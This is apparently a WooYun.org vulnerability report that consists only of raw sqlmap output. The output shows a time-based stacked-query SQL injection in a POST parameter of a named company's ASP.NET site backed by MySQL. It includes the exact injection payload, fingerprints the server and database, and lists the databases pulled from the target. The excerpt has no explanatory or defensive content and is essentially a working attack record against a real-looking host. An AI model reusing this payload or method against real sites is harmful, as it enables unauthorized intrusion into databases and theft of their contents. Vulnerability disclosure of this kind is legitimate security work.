WooYun.org

(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the oth
ers (if any)? [y/N] n
sqlmap identified the following injection points with a total of 73 HTTP(s) requ
ests:
---
Parameter: #1* ((custom) POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: page=1&pageSize=19&status=1 AND 3;(SELECT * FROM (SELECT(SLEEP(5)))
vxVU)#21=6 AND 917=917
---
[18:51:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.11
[18:51:44] [INFO] fetching database names
[18:51:44] [INFO] fetching number of databases
[18:51:44] [INFO] retrieved:
[18:51:44] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[18:52:22] [INFO] adjusting time delay to 1 second due to good response times
3
[18:52:23] [INFO] retrieved: information_schema
[18:55:23] [INFO] retrieved: tes
[18:56:03] [ERROR] invalid character detected. retrying..
[18:56:03] [WARNING] increasing time delay to 2 seconds
t
[18:56:27] [INFO] retrieved: vcyber_website
available databases [3]:
[*] information_schema
[*] test
[*] vcyber_website
[19:00:29] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[19:00:29] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.vcyber.com'
[*] shutting down at 19:00:29